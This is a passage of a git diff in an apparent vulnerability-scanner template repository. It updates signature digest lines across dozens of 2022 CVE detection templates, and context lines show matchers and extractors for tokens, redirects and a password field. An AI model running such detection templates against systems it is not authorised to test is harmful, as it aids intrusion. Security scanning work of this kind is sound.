Notifier Lite")' condition: and - -# digest: 4a0a00473045022100fcf45d1f380b0f54d89c11819767ab04d71d567dc6bfa81dfcdb898665d78100022026f6f0754090339cc42d1fd983463f9852f68096f44c3efeff0ffeb5c792235d:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203fb4b91eccb1c8a8bc8b5df9b439399afbd9c808b4a537127dfef766e7ec065502200e90e40aec1054f57a65dd040322c450881fbdbf927e34a4323b75748cb97fa5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4328.yaml b/http/cves/2022/CVE-2022-4328.yaml index 4b4f8886da..8cbb51de55 100644 --- a/http/cves/2022/CVE-2022-4328.yaml +++ b/http/cves/2022/CVE-2022-4328.yaml @@ -60,5 +60,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502205fca2d36833ddbd6f1f636b9311a680f661107aa9dedf5328170b8afb5dd7987022100912daaacbe92f411c935031120efb41aa8ded609136bb557ab2f534142b024ef:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201318a7a0ace1e85380e1788bf190aba6125567d6cb44822498fed4d0310a8df202205c0be519b7e83c551fca374ae22e3ee4b2fdab57d5f72cafba8411764f08ef5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-43769.yaml b/http/cves/2022/CVE-2022-43769.yaml index 1d3562b904..05cb5f42cf 100644 --- a/http/cves/2022/CVE-2022-43769.yaml +++ b/http/cves/2022/CVE-2022-43769.yaml @@ -48,5 +48,4 @@ http: part: header words: - "application/json" - -# digest: 490a0046304402205895812e907610c88c3136e475c2fcb2313c66dc6f7ecc6d6aa5addd6d22b37502201e85695be4ebb98898942ed23a592523064d651834df50bf2a33729291a6e30b:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009e506a46a2e7080d43e2ad78f2fb084300d07df756a5defe506697862944ff8d022100dd36de39e84bb4319f59287c15d518dd16a0bf48cb047be835299c616fc67fae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44290.yaml b/http/cves/2022/CVE-2022-44290.yaml index 00cc33f3cf..6fed7df0ab 100644 --- a/http/cves/2022/CVE-2022-44290.yaml +++ b/http/cves/2022/CVE-2022-44290.yaml @@ -64,5 +64,4 @@ http: - contains(header, "text/html") - contains(body, 'Delete the following?') condition: and - -# digest: 4a0a0047304502202402312b1baaa2a2fa9c6d79e56094f67c21a3600d9959250534958a229f775002210082e5bf5d82efab73cc198a55bdb9cc035ccd0c271c6cf361fb5f1f5f521961d2:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e80420cff807ddc4b2b6780c3ecf5eb5055d27cc23fb1b8fc9664b45e91606210220660f37141d63dd2066a0de8efef058808615aee0059f3bf3b84917624013657f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44291.yaml b/http/cves/2022/CVE-2022-44291.yaml index 87a50b672d..005dad681e 100644 --- a/http/cves/2022/CVE-2022-44291.yaml +++ b/http/cves/2022/CVE-2022-44291.yaml @@ -65,5 +65,4 @@ http: - 'contains(header_2, "text/html")' - 'contains(body_1, "webTareasSID")' condition: and - -# digest: 4b0a00483046022100a8a806d02f2af74935a19010fb6d2a0d5e72309447518135369f726b90023d1c022100c871750024bbe276ccba5663cd65c7158ae303173ef80948cb5bfa8eb0fe2044:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ef3de3e47d984187e2be820a9c33c75a122d6e7c66b51fa4b36f5de69c21bcc4022100d2092284d0fc628f8b13611cf092a6a23659360ac05dc90451917bb25fc64d9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4447.yaml b/http/cves/2022/CVE-2022-4447.yaml index bbb61f23a4..e617a937d3 100644 --- a/http/cves/2022/CVE-2022-4447.yaml +++ b/http/cves/2022/CVE-2022-4447.yaml @@ -46,5 +46,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "{{md5(num)}}")' condition: and - -# digest: 4a0a0047304502204561b35050fa398af2369484d4582bcf3569c10c031a6cfa7284411caf1caca70221009d2c43d259210f63173d2e747bd9ed7dc8e729122e209f9b19b61697e56a0fab:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022060db03641026fef68ac60f860c9acfd47c727c88d0f5afa685fa54c365ade4a2022100e52ce9e389b99cf5977cc3bea3eaea04d1b6abf47b3eb22f7afc3068e4830f24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44944.yaml b/http/cves/2022/CVE-2022-44944.yaml index 50c43d1e08..38e1978e71 100644 --- a/http/cves/2022/CVE-2022-44944.yaml +++ b/http/cves/2022/CVE-2022-44944.yaml @@ -66,5 +66,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true - -# digest: 4a0a0047304502204950e9f05ec0a09032629ba8793677d6bf49dcce6645c8f98d704e2be872ca0002210090619c5fbcb7b5cf9a79151945ba56b53033e048d142671a49e340c040ae11d7:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100bcf200e4ace7537593e1ca41eb9b8781339ac846a9ce48dfd2e43b6302aced93022031559d5b5b8d407f30ec62bcc4373a7d866ab4cefb5c72b2ec977d901b8224f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44946.yaml b/http/cves/2022/CVE-2022-44946.yaml index b5badb03b4..cae2748f0b 100644 --- a/http/cves/2022/CVE-2022-44946.yaml +++ b/http/cves/2022/CVE-2022-44946.yaml @@ -66,5 +66,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true - -# digest: 4a0a00473045022100ba31329ea7504d3099cfc608f093dc632bca3f29bfec9dfb385f50e656cd450c02204369aa0e38ccc8733e1c941bcbf9232b6a7b146cdfe08bc7935b1bbf6bed30cc:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201245c9d8f29fbb2e33301baee0e6283a69304221cdb46d01d4e8b95f32c493ac02207a39fdfe9ef1eca69548c5a54f9c8d6077b62965b8c4f3b680f30e5be395c4f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44947.yaml b/http/cves/2022/CVE-2022-44947.yaml index bec32fdddf..dd30cfc72b 100644 --- a/http/cves/2022/CVE-2022-44947.yaml +++ b/http/cves/2022/CVE-2022-44947.yaml @@ -66,5 +66,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true - -# digest: 4a0a00473045022100fdcaffb11f5f2fb1c20dee413bbf80802dc1a1f0d124838d3665cbd695bb3db302201c9100635ced06fa1ff449c0d54a2f6e79810181310e6d7023e53eed65caf01f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204cff73a7507185df266d994095bad4de99e2e38a4b06a18c7b4d1f2bf2e195480221008da1453c34782c619356c7417c9fd4eb2701acc14331a54a7c9495a20d28e3cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44948.yaml b/http/cves/2022/CVE-2022-44948.yaml index 66f0191b53..af0c1009b4 100644 --- a/http/cves/2022/CVE-2022-44948.yaml +++ b/http/cves/2022/CVE-2022-44948.yaml @@ -65,5 +65,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true - -# digest: 4a0a00473045022100d6b59b70675f5c4d2b6477a5641f7a33173b1e9a452a11ab5843376e4a188d8c0220648b1bf6db0020f0d179126f21cdcef779280b4de9468b21f09afb4cd783a7c9:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207ec9ec3a047e97755367b7608008a76b1e95af74e1bf416733faec94414ea31502200927ee1945d77baf3761387ab94a27ce31b533816a9c76b9aecf62c10ad0e76e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44949.yaml b/http/cves/2022/CVE-2022-44949.yaml index c276e4d962..038009aa97 100644 --- a/http/cves/2022/CVE-2022-44949.yaml +++ b/http/cves/2022/CVE-2022-44949.yaml @@ -133,5 +133,4 @@ http: regex: - id="form_session_token" value="(.*)" type="hidden" internal: true - -# digest: 4b0a00483046022100a59ae667765760ffd8a5651a845155710494cf96a5f86c50576b915a6a0e814002210095097f4d2722167d08d65521491e652afc83cbdf2fdcd4e54939e1924c25a74e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c7bbd612c60f6b3734709e9fb54e800ab6005f9f2b91df6096cf33a40b6d3d6302200b455d93b47bb01a64097e572c621eed77ecb20add24c10d396df7b6d674b852:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44950.yaml b/http/cves/2022/CVE-2022-44950.yaml index 22ee322492..470aca4e23 100644 --- a/http/cves/2022/CVE-2022-44950.yaml +++ b/http/cves/2022/CVE-2022-44950.yaml @@ -133,5 +133,4 @@ http: regex: - id="form_session_token" value="(.*)" type="hidden" internal: true - -# digest: 490a0046304402203ba25618283201dc7805fe0d00f830754e5d751f7e5bcbf1f15ce60ce1421153022022c4d5a708ccab6c563ff593132ae2d8ce234d6d8912b075ed3a64b71854823e:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201e514b52dc4d1c73f112a400bd21e5ec93a676f7aac15a6594bddd733129e4d60220226e08bbeabecad987b349ded62e5a0fa0200416e17fd92bf9c006c7c14fb5a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44951.yaml b/http/cves/2022/CVE-2022-44951.yaml index b47bd7f7f2..652bfd0fba 100644 --- a/http/cves/2022/CVE-2022-44951.yaml +++ b/http/cves/2022/CVE-2022-44951.yaml @@ -64,5 +64,4 @@ http: regex: - 'id="form_session_token" value="(.*)" type="hidden"' internal: true - -# digest: 4a0a0047304502202b3263dc85c439523f3d13701439bded73716aa33b3dbccc3a8a35ad905bc86302210093c4e86cb7bef5c82d7f71c14ba1a0565e9805487ddf9f2bfbd42aa69a61cd74:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a54f513453d245c8a4cf4e67a4345b2a490d7f87fff777e8c98a0bc1ae23d5ee022020380b1c964253e0a9a9f444f970a53b79726d2cd2d1c85cd3bac933a8ca8da4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44952.yaml b/http/cves/2022/CVE-2022-44952.yaml index ac90a62a1c..89f9d925be 100644 --- a/http/cves/2022/CVE-2022-44952.yaml +++ b/http/cves/2022/CVE-2022-44952.yaml @@ -146,5 +146,4 @@ http: regex: - id="form_session_token" value="(.*)" type="hidden" internal: true - -# digest: 4a0a00473045022100fbd6d78b6298b359f9f3829cc5a644fd67b8e460f3b13a1cb8edd7905359466602202645627969f5b9a0eda8cebd76dea4a182caf3f7e896c287b17c5c10d4e7dd6e:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b77bc8f7c06e04593b746c0580767fcd1bc92f7423bc860b5dbb945050415e86022100cd17c3e25a23b6e37ae87050db1efc5e99bdaeaf544be24d5f654086e616e759:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-44957.yaml b/http/cves/2022/CVE-2022-44957.yaml index 4e7f411cbc..a7e73bc6a1 100644 --- a/http/cves/2022/CVE-2022-44957.yaml +++ b/http/cves/2022/CVE-2022-44957.yaml @@ -169,5 +169,4 @@ http: regex: - 'name="csrfToken" value="([0-9a-zA-Z]+)"' internal: true - -# digest: 4a0a00473045022036a3a12842c43ce23641bbae6c22245ffc7132cdbc399d738eda94237968bead022100cf7bebaee845780fbfe837b18662b3fd3ec1152e27ef37a92c85a4585717147d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b8a82d0ead3c5546a8e454c2e02d19c5e3e62532405cf185b14d102ae81a5d66022056baa668d183b29ed93f16a6c3aa5228ebc1da7d94d26cf8738f201a9d7e3735:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-45037.yaml b/http/cves/2022/CVE-2022-45037.yaml index 82fa3eeffc..8e5ba090a3 100644 --- a/http/cves/2022/CVE-2022-45037.yaml +++ b/http/cves/2022/CVE-2022-45037.yaml @@ -103,5 +103,4 @@ http: - 'name="username_fieldname" value="(.*)"' internal: true part: body - -# digest: 490a0046304402200f2c512b067c34bccfbe1add36f80a3cdbdc7a2492f7718f78d2a92fffa7134a02201e0e1e34162a6e929286aa248ccd3dead72cfed108b31932a7254ad20683433f:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204ff0ef7a66ad6003bd5b733f39475871191e45f27202d0c98eb464f3839ea52502207ae2e0bfdd6dca8982505474167d279a18bd05eb66d382137df283321611cca2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-45038.yaml b/http/cves/2022/CVE-2022-45038.yaml index 6b8f9d0fe5..65201826ad 100644 --- a/http/cves/2022/CVE-2022-45038.yaml +++ b/http/cves/2022/CVE-2022-45038.yaml @@ -103,5 +103,4 @@ http: - 'name="app_name" value="(.*?)"' internal: true part: body - -# digest: 490a0046304402203df147282274da9155e23e0c593f0e894487edff0a18b9948e0b1b08eef8d0a102207b0cf440d32a76411cd6143cf3455a3f753a4354b544b68dde167ccf0a273264:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100fcae3e70897c6843aeaf0846877256b853c7c5e458fa54f0f27d327ca6caea61022061a93dfe704933c804d4f1bc6095cc511e466b803294d678ef1df50f0a1f5bc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-45917.yaml b/http/cves/2022/CVE-2022-45917.yaml index f0441fc522..c4973f8315 100644 --- a/http/cves/2022/CVE-2022-45917.yaml +++ b/http/cves/2022/CVE-2022-45917.yaml @@ -42,5 +42,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' - -# digest: 490a00463044022018eb4217a22e3ee4c7f62bf743c9480e4e31e220986b58d8336ba16fae52f892022011c4af27aeff9665d9572a4c20272b3989633c41722b8571807bbcbfb7f68c83:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203e4bf0c24bf43072776a233168eefb145a82c170fb08c9899da183dba020b17802200234dee8c8fab78dc316686a049d4f10e9f45d0841637be049bf431b9012a4c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-45933.yaml b/http/cves/2022/CVE-2022-45933.yaml index 2c589b0ece..6f7ca54a55 100644 --- a/http/cves/2022/CVE-2022-45933.yaml +++ b/http/cves/2022/CVE-2022-45933.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100e110edfb28881a1524c9afc6abfc24bf0d1d333bccb514facaf3030563dfbde10221008546fc86620a612d1b658c46c268f96ee64bfddf735cd57ca90cd5c940f3fa01:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022025422daa8541999efd4b1797850a9dd175681e4af80b357bec3f64580818cb4c022100d6bd947904ae74a934718147632ba7c6f70be656569f953fe7086087994db695:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-46020.yaml b/http/cves/2022/CVE-2022-46020.yaml index 45e5f88860..73075f8249 100644 --- a/http/cves/2022/CVE-2022-46020.yaml +++ b/http/cves/2022/CVE-2022-46020.yaml @@ -133,5 +133,4 @@ http: - name="app_name" value="(.*)" internal: true part: body - -# digest: 4a0a0047304502203e65df70afe7c71c2d95db4c7d045895966e760a4028c554bfe4324b6540b80b022100c8ba87d33a9b383604388df239a32c15bd775ae046abb1d247ae2fce6d2c7b17:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220352e70bc747c95f3980df897c016af1639906092e61d9317cd08a7c397f80b4b022100cba06dd6b3a82f19812778f741d1ecff543b4deb79293b1eb68327511cef45e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-46071.yaml b/http/cves/2022/CVE-2022-46071.yaml index 1a205998a2..cde351216d 100644 --- a/http/cves/2022/CVE-2022-46071.yaml +++ b/http/cves/2022/CVE-2022-46071.yaml @@ -45,5 +45,4 @@ http: - 'status_code_2 == 200' - 'contains(body_2, "Helmet Store") && contains(body_2, "Adminstrator Admin")' condition: and - -# digest: 4b0a00483046022100b19819c3e577a0e33066eca5353856d5873792798f212a18927b20eb78339a4a022100ffd329977ed9f61cbe9f540385cec1743379f2838139f8c7f38038017e96cec1:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202720e0d7566ac6f3e4e08e95d93a6ef3174d617057a452c2ba65debc396958e002200c6d30fe40e9f700041d37dedbd4a2decc8008d0a38fe1910d1732fb13c3c54e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-46073.yaml b/http/cves/2022/CVE-2022-46073.yaml index a192286896..47c2084c49 100644 --- a/http/cves/2022/CVE-2022-46073.yaml +++ b/http/cves/2022/CVE-2022-46073.yaml @@ -39,5 +39,4 @@ http: - 'contains(body, "Helmet Store Showroom")' - 'contains(body, ">")' condition: and - -# digest: 4a0a00473045022100bd2bcce528eb8462b8948fd8e16850f474c488e0532e5a181eccbc0806ec1ea702202d916d08820d695916c904dfddb05fcead071542f0e163800ddf142a000d9afd:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a9f3fd5944e586256244d235321818b9a8cab47fddd22abfca7cb3f6c36aa53d022100e797c3a49625f13f3e9ffed63641fb86fb3af8f69474c574c287a5f7db382161:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-46169.yaml b/http/cves/2022/CVE-2022-46169.yaml index ac1be1b705..dc95615984 100644 --- a/http/cves/2022/CVE-2022-46169.yaml +++ b/http/cves/2022/CVE-2022-46169.yaml @@ -63,5 +63,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022039c93cb298789192eae7121274c911c4d978370ea8d531aeeff2643a0bdec197022065d145f00a1bd7c2bde0bdfa395f7d17018515d4cd1fe36f3425151945edd3c3:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b5129d6c98b815bb9f54ffab021b93e2a63e1d3950b273d70b3894e95c04399902202096a4b2bf64ae727c1d96eb27ccd02d09449971a8d27b5a0174000c1b4ca8bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-46381.yaml b/http/cves/2022/CVE-2022-46381.yaml index 83a4b8760f..2bc519a2ee 100644 --- a/http/cves/2022/CVE-2022-46381.yaml +++ b/http/cves/2022/CVE-2022-46381.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220047cbf4465d4f1ddc01b4fc8817ebd37d8accacf1ff9668ae6afcfc0ce46965502207f2ee4e92d1fb630c81faffdf6a89401cc66f2fce023cefcb014476871f2f287:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200382056ef80c7fa9d9af40d5c29d8f826ccee95fa939bff106582d9707f5af9002207f2f34607cc3923ecedea98cd37ed52f220793b325d20e1d2973a2b87c48a4e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-46443.yaml b/http/cves/2022/CVE-2022-46443.yaml index f5a9d8da63..e53ee96246 100644 --- a/http/cves/2022/CVE-2022-46443.yaml +++ b/http/cves/2022/CVE-2022-46443.yaml @@ -50,5 +50,4 @@ http: - type: word words: - '{{md5({{num}})}}' - -# digest: 4b0a00483046022100a378d5b1185b661357bb592e26b73ff322c36e0b9d79ddf25ff8531a3b39b7f0022100bd09f0b3f301f624a82b8e9a852a85878a3ff5385af9e3ace8b49a70b7d4bf67:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206da716d9311c144e64d4cdfb0a03ef012420ead16dee800727b04aa368752e30022027dfcb4886fd6dcf31cb96cf3f4921d544bcb23c49ff59f1460fe8ebbdcadf3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-46463.yaml b/http/cves/2022/CVE-2022-46463.yaml index ed8db66da7..ed88b27db9 100644 --- a/http/cves/2022/CVE-2022-46463.yaml +++ b/http/cves/2022/CVE-2022-46463.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502200599215556c55e61137579f3678342e35a505040e67e27232b1102a220953b28022100b06307630d5114eb26fb7f56cc3110a3a32580a171f747cf3f05a289a49becca:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a66aa442ed481363e77e8689020b502e0c83ef6a15e421d4763b962dc228d3fa022100d56e1cb6b1bbec7520f8bd3806d019bbf6ccdabb63216d9d66a967a7d55d6ce1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-46888.yaml b/http/cves/2022/CVE-2022-46888.yaml index 3696bcf050..f7f3578e1c 100644 --- a/http/cves/2022/CVE-2022-46888.yaml +++ b/http/cves/2022/CVE-2022-46888.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100eb7e52c9dabea792a1366c2b721d520870f43e256df5fd21e22f1b0b423772c70220052fce488e41e8e3566760ecaa135749a143df7fef31531e495f978ea22d3217:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402205293b0e35ff4d3f4ec76a36bf2501bc531caac3f96fa74b16ffa4e37320fd344022071578e22de8d9b2265fa00cfc25df5bf015f5d2a04b9a5e515b3f6ef0e2a9c29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-46934.yaml b/http/cves/2022/CVE-2022-46934.yaml index b2fe010b95..fffdf62968 100644 --- a/http/cves/2022/CVE-2022-46934.yaml +++ b/http/cves/2022/CVE-2022-46934.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502206c851a7ee1e9999926c3f9a8674d25963fe6b37b154e48aebd946410d34c099c022100a8883602cd4ac985c48334bd7cef639ce380b260507aa00aac4f7357c1326ee3:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220121d273aaf1d706660d80272a6db8661da9cb55d50f63fb2c4a65a2dd90cc412022024d6598e06a586b971a34c2c3fdffcebf89539afd77c65a115b7a3696aa38cd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-47002.yaml b/http/cves/2022/CVE-2022-47002.yaml index b4a665bdae..9208396da4 100644 --- a/http/cves/2022/CVE-2022-47002.yaml +++ b/http/cves/2022/CVE-2022-47002.yaml @@ -74,5 +74,4 @@ http: - '"lastupdatebyid":"([A-F0-9-]+)"' internal: true part: body - -# digest: 490a0046304402206e62c49b095313484e55a68910495b3065ed87da3a4298cb06ed3872080ad9da0220437b9e028ef34994fe7fcb0779b3470533052b4ecf6827006f262c411a45493b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220661a578d1be6bac2825752f582640b3b91afd66e5dd2acb7dda12e2fe2b76f15022100a011addfc1fb61ebe0f50772f0c5f29c58d294172f4cee71c3fdbd05aa25ddee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-47003.yaml b/http/cves/2022/CVE-2022-47003.yaml index 861355bc49..9c3bf619cb 100644 --- a/http/cves/2022/CVE-2022-47003.yaml +++ b/http/cves/2022/CVE-2022-47003.yaml @@ -74,5 +74,4 @@ http: - '"lastupdatebyid":"([A-F0-9-]+)"' internal: true part: body - -# digest: 4a0a00473045022100d3704f974f06bca9b8aad3862a52e085a8ee00e440ca96f27ba9abc04950c55b022065355ea435a2b936c77c2f8c540f0b2b7b49b394cadbff7d4ce2f2f40b799028:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210097e5a2bcbde559a614816135d4a0c41c5f56881aa7b4b2810b3593ad7a6560fa02204dbf3df8fef518beadc46b8da99d881203c9a1364802742979fa64e131be899f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-47075.yaml b/http/cves/2022/CVE-2022-47075.yaml index 2944a289d6..c5d67b5659 100644 --- a/http/cves/2022/CVE-2022-47075.yaml +++ b/http/cves/2022/CVE-2022-47075.yaml @@ -38,5 +38,4 @@ http: - 'contains(content_type, "application/CSV")' - 'contains(body, "EmployeeName") && contains(body, "EmployeeCode")' condition: and - -# digest: 4a0a00473045022100946836ea103141b55bcc85a90924aec0e9a10a0b87d54b048d385339e79124ba022073d3bb742854654e7dcd4d180aa5804d09a7b7e0f47cdfd11e2b7a9084563bac:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ac3c3f0064bf6b71e631ab0bfed154bd5850e0403df4bf1c6a391dbd6971222b022100ebdadcd4ded691222dd9d13f1c851815808b9a8131ed8853826e6d0d386d4575:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-47615.yaml b/http/cves/2022/CVE-2022-47615.yaml index 96af5a57b0..f71779016a 100644 --- a/http/cves/2022/CVE-2022-47615.yaml +++ b/http/cves/2022/CVE-2022-47615.yaml @@ -57,5 +57,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100cdb1007de201dc16398ee4a54c46d1a969798519c616c331dd7cc94bf2f46e280221008ee918e0fe6c956aa9d522483732450f3c8f84379d5d037da10377dea39d2a3e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b63ee2dbbbcd3d3ed64e07a9fe763ce9eb8cda167f24f09f8da5763d464f84a7022031fa87f0003190dc7d5494a09764ee3f1e2e5bdb705ed3c6cb4d6217ce2fc3a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-47945.yaml b/http/cves/2022/CVE-2022-47945.yaml index 19c833be34..007dd1a2f5 100644 --- a/http/cves/2022/CVE-2022-47945.yaml +++ b/http/cves/2022/CVE-2022-47945.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 500 - -# digest: 4a0a004730450220569ded745d776d7298160e7eb67ed6bd7900955bcf51e72a434c42d2565c6bc5022100f5322004da018ecb3225eabbb2c1dda7cc728779bc0fbad4d70eced60aa4b98f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210086d65d7f9e8d16b47e93b0bc6068b46a7908a485337b853607c3777d2afe39700220361948c1e72f8c81f937ce2157ba0e2a01ba9f353fa762060b04509f440a4259:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-47966.yaml b/http/cves/2022/CVE-2022-47966.yaml index 250eba9599..45c682aec0 100644 --- a/http/cves/2022/CVE-2022-47966.yaml +++ b/http/cves/2022/CVE-2022-47966.yaml @@ -56,5 +56,4 @@ http: - type: status status: - 500 - -# digest: 4a0a0047304502203d322fd746cde5d9f988bafe6e0065fa9a828d11ad66e271ed260f19d9972830022100eee9abfb7eb45433950897f3cc015cbfbb4d30967d448c19182c7b508f0f4c23:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008a0fd545ba4709aa5eed8ce4cdc251b78575e878ed90c7619c292ca37fd657eb022100f63221f7f8288a56446d16687d67866c37143400fb00c263f1342421e8d6afb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-47986.yaml b/http/cves/2022/CVE-2022-47986.yaml index a9182399c4..69f18819a4 100644 --- a/http/cves/2022/CVE-2022-47986.yaml +++ b/http/cves/2022/CVE-2022-47986.yaml @@ -53,5 +53,4 @@ http: - type: status status: - 500 - -# digest: 4a0a004730450220622b6ae60c8f7d45435906379995e091b3f4faec3ccf54d2d22810369872a11b022100e4801d1a2ba3a4a4043630cc57bc522a9bcbe25dd8c7cb8ff3192ec3a959e8ea:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100eea0d09b04eb65e3e055692e31aa5d0bd5ce2d970b77a5dee107fde5f17b635f022100cc7d637e2305154fc85bc3a3d5d06ae4953b3be8ba7badd40cfe657a7c609883:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-48012.yaml b/http/cves/2022/CVE-2022-48012.yaml index 3d327f6098..16bbd4f3a4 100644 --- a/http/cves/2022/CVE-2022-48012.yaml +++ b/http/cves/2022/CVE-2022-48012.yaml @@ -53,5 +53,4 @@ http: - contains(body_1, "opencats - Login") - contains(body_3, "") condition: and - -# digest: 490a00463044022031605b5572d64d764ebcb4584dd3227bcbd2d1149843287267369d0a14125e91022077af4f1193a98b4a99c1b656085b4c36cb38e8e806e7ba4fc42304d70a23512d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203645c38b1322bc73c1ea12b658088a386ac73e885b6eb638869e68827a5ca149022100b3cc916420a6c3877830eab9e453f191f6a92e8a2e4859830faf6c9373cb2ee4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-48165.yaml b/http/cves/2022/CVE-2022-48165.yaml index 7a207848f5..5e77b2e896 100644 --- a/http/cves/2022/CVE-2022-48165.yaml +++ b/http/cves/2022/CVE-2022-48165.yaml @@ -57,5 +57,4 @@ http: - type: regex regex: - 'Password=([^\s]+)' - -# digest: 4a0a0047304502204e35c964fc42591bafcd05ac5f13c9610b90fd410e206ac43b75cce5341daec50221009dfc96ac1b123b3371c55dbb3e35be3e21c7d9a70b52570417cc809ead9d764d:922c64590222798bb761d5b6d8e72950 +# digest: 